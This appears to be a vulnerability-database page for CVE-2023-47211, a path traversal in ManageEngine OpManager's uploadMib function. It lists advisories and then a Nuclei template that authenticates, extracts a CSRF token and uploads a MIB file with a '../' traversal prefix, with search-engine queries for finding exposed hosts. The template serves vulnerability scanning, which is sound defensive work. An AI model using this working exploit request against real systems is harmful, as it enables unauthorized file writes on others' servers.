| Title | Published | Views | Reporter |
|---|---|---|---|
| The vulnerability of the uploadMib function in the network monitoring software OpManager, OpManager MSP, OpManager Plus, Network Configuration Manager, OpUtils, and the network traffic analyzer NetFlow Analyzer allows a hacker to execute arbitrary code. | 22 Feb 2024 00:00 | – | bdu_fstec |
| CVE-2023-47211 | 12 Jan 2024 21:17 | – | circl |
| ZOHO ManageEngine OpManager Path Traversal Vulnerability | 8 Jan 2024 00:00 | – | cnnvd |
| CVE-2023-47211 | 8 Jan 2024 14:45 | – | cve |
| CVE-2023-47211 | 8 Jan 2024 14:45 | – | cvelist |
| ManageEngine OpManager Path Traversal (CVE-2023-47211) | 12 Jan 2024 00:00 | – | nessus |
| CVE-2023-47211 | 8 Jan 2024 15:15 | – | nvd |
| CVE-2023-47211 | 8 Jan 2024 15:15 | – | osv |
| Directory traversal | 8 Jan 2024 15:15 | – | prion |
| PT-2024-1784 · Zoho · Manageengine Opmanager | 8 Jan 2024 00:00 | – | ptsecurity |

```yaml
id: CVE-2023-47211

info:
  name: ManageEngine OpManager - Directory Traversal
  author: gy741
  severity: high
  description: |
    A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability.
  impact: |
    Unauthenticated attackers can write arbitrary files to the system via path traversal, potentially creating backdoors or compromising system integrity.
  remediation: |
    Update ManageEngine OpManager to version 12.7.259 or later.
  reference:
    - https://talosintelligence.com/vulnerability_reports/TALOS-2023-1851
    - https://nvd.nist.gov/vuln/detail/CVE-2023-47211
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N
    cvss-score: 8.6
    cve-id: CVE-2023-47211
    cwe-id: CWE-22
    epss-score: 0.47024
    epss-percentile: 0.98688
    cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: zohocorp
    product: manageengine_firewall_analyzer
    shodan-query:
      - "http.title:\"OpManager Plus\""
      - http.title:"opmanager plus"
    fofa-query: title="opmanager plus"
    google-query: intitle:"opmanager plus"
  tags: cve,cve2023,zoho,manageengine,authenticated,traversal,lfi,intrusive,zohocorp,vuln

http:
  - raw:
      - |
        POST /two_factor_auth HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        j_username={{username}}&j_password={{password}}
      - |
        POST /client/api/json/mibbrowser/uploadMib HTTP/1.1
        Host: {{Hostname}}
        X-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}}
        Content-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262

        -----------------------------372334936941313273904263503262
        Content-Disposition: form-data; name="mibFile"; filename="karas.txt"
        Content-Type: text/plain

        ../images/karas DEFINITIONS ::= BEGIN
        IMPORTS
        enterprises
        FROM RFC1155-SMI;
        microsoft OBJECT IDENTIFIER ::= { enterprises 311 }
        software OBJECT IDENTIFIER ::= { microsoft 1 }
        systems OBJECT IDENTIFIER ::= { software 1 }
        os OBJECT IDENTIFIER ::= { systems 3 }
        windowsNT OBJECT IDENTIFIER ::= { os 1 }
        windows OBJECT IDENTIFIER ::= { os 2 }
        workstation OBJECT IDENTIFIER ::= { windowsNT 1 }
        server OBJECT IDENTIFIER ::= { windowsNT 2 }
        dc OBJECT IDENTIFIER ::= { windowsNT 3 }
        END
        -----------------------------372334936941313273904263503262--
      - |
        POST /client/api/json/mibbrowser/uploadMib HTTP/1.1
        Host: {{Hostname}}
        X-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}}
        Content-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262

        -----------------------------372334936941313273904263503262
        Content-Disposition: form-data; name="mibFile"; filename="karas.txt"
        Content-Type: text/plain

        ../images/karas DEFINITIONS ::= BEGIN
        IMPORTS
        enterprises
        FROM RFC1155-SMI;
        microsoft OBJECT IDENTIFIER ::= { enterprises 311 }
        software OBJECT IDENTIFIER ::= { microsoft 1 }
        systems OBJECT IDENTIFIER ::= { software 1 }
        os OBJECT IDENTIFIER ::= { systems 3 }
        windowsNT OBJECT IDENTIFIER ::= { os 1 }
        windows OBJECT IDENTIFIER ::= { os 2 }
        workstation OBJECT IDENTIFIER ::= { windowsNT 1 }
        server OBJECT IDENTIFIER ::= { windowsNT 2 }
        dc OBJECT IDENTIFIER ::= { windowsNT 3 }
        END
        -----------------------------372334936941313273904263503262--

    host-redirects: true
    max-redirects: 3

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "MIBFile with same name already exists")'
        condition: and

    extractors:
      - type: regex
        name: x_zcsrf_token
        group: 1
        part: header
        regex:
          - 'Set-Cookie: opmcsrfcookie=([^;]{50,})'
        internal: true
# digest: 4a0a00473045022100c41f6b9727c16b2ac2fe024a4711609142b90469db9e0489f7896e93671f994e022028d544bdfbbd4a18ce0454cfa22597f72dd3d9723805b6470af62f24a5f48db0:922c64590222798bb761d5b6d8e72950
```